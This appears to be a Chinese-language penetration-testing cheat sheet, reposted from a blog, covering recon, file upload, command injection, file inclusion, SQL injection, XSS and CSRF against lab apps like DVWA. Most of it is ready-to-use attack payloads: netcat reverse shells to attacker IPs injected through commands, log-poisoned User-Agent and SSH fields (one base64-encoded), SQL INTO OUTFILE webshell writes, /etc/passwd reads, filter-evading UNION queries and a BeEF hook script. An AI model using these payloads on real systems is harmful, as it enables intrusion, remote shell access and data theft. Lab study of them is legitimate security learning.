渗透测试常见技术

1.信息收集
IP address
domain name info
technologies used
other websites on the same server
dns records
unlisted files,sub-domains,diretories

主要工作:whois查询网站详细信息,扫描子域,扫描目录查看敏感信息

较多为国外网站,若不能访问建议翻墙试试。

?url=
https://www.robtex.com

2.文件上传
连接后门的基础,必须知道文件存放的地址。
weevly generate [password] [file name] ---------生成php类型的后门文件
weevly [url to file][password] ---------连接后门文件
三种情况
1)直接上传后台代码
2)绕过检测文件格式,通过burpsuite抓包将修改文件后缀 filename.php->filename.jpg filename.jpg->filename.php
3)同样是抓请求包,filename.jpg -> filename.php.jpg

3.代码执行
网站窗口跟commond有关系的,linux系统可以使用;| 来运用代码执行进行提权
eg:
20.20.10.223;nc -e /bin/sh nc_server_ip port
20.20.10.223|nc -e /bin/sh nc_server_ip port

提权代码
nc -vv -l -p 8080 -----用来监听端口

4.本地、远程文件包含
存在文件包含的链接地址?page=http://www.likecs.com/../../../../../etc/passwd
?page=http://www.likecs.com/../../../../../etc/passwd

/proc/self/environ
/var/log/auth.log
/var/log/apache2/access.log

?page=http://www.likecs.com/../../../../../proc/self/environ
通过burpsuite抓包,修改用户代理User-Agent:<?phpinfo();?>
User-Agent:<?passthru("nc -e /bin/sh 192.168.101.3 8888");?>

?page=http://www.likecs.com/../../../../../var/log/auth.log
ssh"<?passthru("nc -e /bin/sh 192.168.101.3 8888");?>"@192.168.101.3(被攻击的对象)
攻击机监听端口nc -vv -l -p 8888
ssh "<?passthru(base64_decode('bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjEwMS4zIDg4ODg='));?>"@192.168.101.3

远程文件包含
一定确保php.ini文件中的allow_url_include=On
创建一个文件包含<?passthru("nc -e /bin/sh 192.168.101.3 8888");?>代码的文件,且能够远程访问。
之后将文件远程包含到被攻击机代码如下
?page=http://ip+文件目录地址


5.Sql injection
adminpass' and 1=1#
monkey' and 1=1#
monkey' or 1=1 #
index.php?page=user-info.php&username=admin' order by 1#&password=adminpass&user-info-php-submit-button=View+Account+Details

union select 1,2,3,4,5
union select 1,database(),user(),version(),5
union select 1,table_name,null,null,5 from information_schema.tables where table_schema = "metasploit"
union select 1,column_name,null,null,5 from information_schema.columns where table_name = "accounts"
union select 1,cid,username,password,5 from accounts

union select table_name,2 from information_schema.tables where table_schema = 'dvwa'
union select column_name,2 from information_schema.columns where table_name = 'users'
medium:--会过滤‘
union select table_name,2 from information_schema.tables where table_schema=0x64767761


1'+uNion/**/sEleCt/**/1,2/**/%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+limit+0,1%23
1'+uNion/**/sEleCt/**/table_name,2+fRom+information_schema.tables+where+table_schema='dvwa'+limit+0,1%23

SQL injection read_write_file:
union select null,load_file("/etc/passwd"),null,null,null
union select null,'example example',null,null,null into outfile '/var/www/mutillidae/example.txt'
write:union select '<?passthru("nc -e /bin/sh 192.168.101.71 8080");?>',null into outfile '/tmp/reverse.php'
union select '<?passthru("nc -e /bin/sh 192.168.101.71 8080");?>',null into outfile '/var/www/dvwa/reverse.php'

tool 功能介绍:
sqlmap -u "...." --os-shell
sqlmap -u "...." --sql-shell
如果是get型号,直接,sqlmap -u “诸如点网址”
如果是post型诸如点,可以sqlmap -u “注入点网址” – data=”post的参数”
如果是cookie,X-Forwarded-For等,可以访问的时候,用burpsuite抓包,注入处用*号替换,放到文件里,然后sqlmap -r “文件地址”

6.xss
存储型xss、反射型xss、dom xss
low :
直接<script>alert('xss')</script>
<a>xss link</a>
<IMG SRC=#>
<IMG SRC=# onerror="alert('xss')"></IMG>

medium :可以调整一下标签的大小写<sCripT>alert('xss')</scrIpt>
<script>alert(String.fromCharCode(120,115,115,50))</script>
<script>alert(String.fromCharCode(&#120;&#115;&#115;&#115;))</script>

使用beef:
“参数”=<script src = "http://192.168.101.71:3000/hook.js"></script>

?name=admin#
?name=<script src="http://192.168.101.71:3000/hook.js"></script>#

veil工具的使用: --------生成无法检测的后门 工具安装未完成
1)evasion
2)ordnance

use 1 ----------几个重要的工具
go/meterpreter/rev_http.py
go/meterpreter/rev_https.py
go/meterpreter/rev_tcp.py

lua/shellcode_inject/flat.py

最终植入方式检测到的veil工具制作的后门

7.csrf
修改密码利用cookie发送挂载的隐藏代码的链接
使用令牌将数据隐藏到用户访问的网站,只要用户提交,将自动修改密码

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wpxjzp.html